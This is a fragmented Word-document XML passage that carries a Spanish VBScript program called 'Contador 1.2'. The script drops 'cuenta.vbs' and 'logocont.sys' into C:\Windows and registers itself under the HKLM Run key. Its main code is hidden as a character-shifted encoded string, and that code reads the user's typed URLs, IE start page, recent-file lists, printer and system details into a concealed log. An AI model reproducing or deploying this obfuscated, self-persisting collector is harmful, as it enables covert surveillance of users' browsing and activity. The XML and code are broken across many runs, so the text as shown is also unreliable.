                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> c4.Clo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c5 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>b.CreateTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> ("inicio.txt",True)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="575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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5.Write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> encriptar(Encoder) c5.Close</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a.Run</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "inicio.txt", 9</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="7591"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if If c2=7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c6 = MsgBox ("¿Quieres desinstalar el Contador?"&amp;VbCrLf&amp;"Atencion: Esto borrara tambien todo el registro del </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="5518"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ontador."&amp;VbCrLf,36,"Contador 1.2") if c6=6 then</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a.regdelete</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ContInicio"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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a.regdelete</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\USERDATALOGCONTADOR" b.deletefile "C:\Windows\cuenta.vbs"</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b.deletefile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "C:\Windows\logocont.sys"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="312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7 = MsgBox ("Desinstalacion completada con exito.",64,"Contador 1.2") end if end if Else</w:t>
            </w:r>
          </w:p>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8= MsgBox ("Este Pc no tiene instalado el Contador 1.2" &amp; vbcrlf &amp; "¿Quieres instalar el Contador?",36,"Contador</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="7587"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1.2") if c8=6 then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="3796"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c9 =</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>b.CreateTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> ("C:\Windows\logocont.sys", True) Set c10 =b.CreateTextFile ("C:\Windows\cuenta.vbs", True)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="708" w:right="638" w:hanging="708"/>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c10.Write </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>encriptar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"Lm#Fqqlq#Qfpvnf#Mf{w_Evm`wjlm#fm`qjswbq+w*_ Elq#j#&gt;#2#Wl#Ofm+w*_ fm`qjswbq#&gt;#fm`qjswbq#%#@kq+Bp`+Njg+w/j/#2**#[lq#0*_ Mf{w_ Fmg#Evm`wjlm_ Evm`wjlm#Fpsb`jl+Vmjgbg*_ Gjn#epl1/#gjm/#plo_ Pfw#epl1#&gt;#@qfbwfLaif`w+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4859"/>
              </w:tabs>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P`qjswjmd-EjofPzpwfnLaif`</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>w!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Pfw#gjm#&gt;#epl1-DfwGqjuf+epl1-DfwGqjufMbnf+epl1-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="5534"/>
              </w:tabs>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fwBaplovwfSbwkMbnf+Vmjgbg***_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>plo#&gt;#plo#%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>#!Vmjgbg</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>#!%#gjm-UlovnfMbnf%#!+!%#gjm-GqjufOfwwfq%#!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="708" w:right="-15" w:hanging="708"/>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9</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>#!_</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>plo#&gt;#plo#%#!?Gjpslmjaof9#!#%#ElqnbwMvnafq+gjm-BubjobaofPsb`f,2317,2317/#0*.3#%#!#Nazwfp=!_ plo#&gt;#plo#%#!?L`vsbgl9#!#%#ElqnbwMvnafq+gjm-WlwboPjyf,2317,2317/#0*.ElqnbwMvnafq+gjm-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging="708"/>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BubjobaofPsb`f,2317,2317/#0*#%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>#!#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Nazwfp=!_ Fpsb`jl#&gt;#plo_ Fmg#Evm`wjlm_ ek&gt;Mlt_ k&gt;Klvq+ek*_ Gjn#epl/#e/#wp_ Pfw#qfd&gt;#@qfbwfLaif`w+!TP`qjsw-Pkfoo!*_ [#&gt;#qfd-</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qfdQfbg#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>+!KHFZ</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>\@VQQFMW\VPFQ_@lmwqlo#Sbmfo_Gfphwls_Tboosbsfq!*_T#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="240"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OL@BO\NB@KJMF_Plewtbqf_Nj`qlplew_Tjmgltp_@vqqfmwUfqpjlm_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Ufqpjlm!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_M#&gt;#qfd-qfdQfbg#+! KHFZ\OL@BO\NB@KJMF_Plewtbqf_Nj`qlplew_Tjmgltp_@vqqfmwUfqpjlm_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>UfqpjlmMvnafq!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>B#&gt;#qfdqfdQfbg#+!KHFZ\OL@BO\NB@KJMF_Plewtbqf_Nj`qlplew_Tjmgltp_@vqqfmwUfqpjlm_PvaUfqpjlmMvnafq!*_ S#&gt;#qfd-qfdQfbg#+!</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KHFZ\@VQQFMW\VPFQ_Plewtbqf_Nj`qlplew_Jmwfqmfw#F{solqfq_Nbjm_Pwbqw#Sbdf!*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>S2#&gt;#qfdqfdQfbg#+!KHFZ\@VQQFMW\VPFQ_Plewtbqf_Nj`qlplew_Jmwfqmfw#F{solqfq_WzsfgVQOp_vqo2!*_ S1#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="74" w:tblpY="-5022"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="39" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8624"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="7254"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>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KHFZ\@VQQFMW\VPFQ_Plewtbqf_Nj`qlplew_Jmwfqmfw#</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WzsfgVQOp_vqo1!*_ S0#&gt;#qfdqfdQfbg#+!KHFZ\@VQQFMW\VPFQ_Plewtbqf_Nj`qlplew_Jmwfqmfw#F{solqfq_WzsfgVQOp_vqo0!*_ J#&gt;#qfdqfdQfbg#+!KHFZ\OL@BO\NB@KJMF_Plewtbqf_Nj`qlplew_Jmwfqmfw#F{solqfq_Ufqpjlm!*_ Jnsqfplqb#&gt;#qfdqfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging="708"/>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OL@BO\NB@KJMF_@lmejd_3332_Pzpwfn_@vqqfmw@lmwqloPfw_@lmwqlo_Sqjmw_Sqjmwfqp_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Gfebvow!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_ Avp`bq#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3"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NQVOjp w!*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Avp`bq2#&gt;#Ofew+Avp`bq/#2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>A2#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3"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 %Avp`bq2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Avp`bq1&gt;Njg+Avp`bq/#1/#2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>A1#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3"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 %Avp`bq1*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Avp`bq0&gt;Njg+Avp`bq/#0/#2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>A0#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3"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 %Avp`bq0*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Avp`bq7&gt;Njg+Avp`bq/#7/#2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>A7#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3"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 %Avp`bq7*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Avp`bq6&gt;Njg+Avp`bq/#6/#2*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>A6#&gt;#qfd-qfdQfbg#+!</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2293"/>
              </w:tabs>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Avp`bq6*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>MVN#&gt;#qfd-qfdQfbg#+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging="708"/>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VPFQGBWBOLD@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LMWBGLQ!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
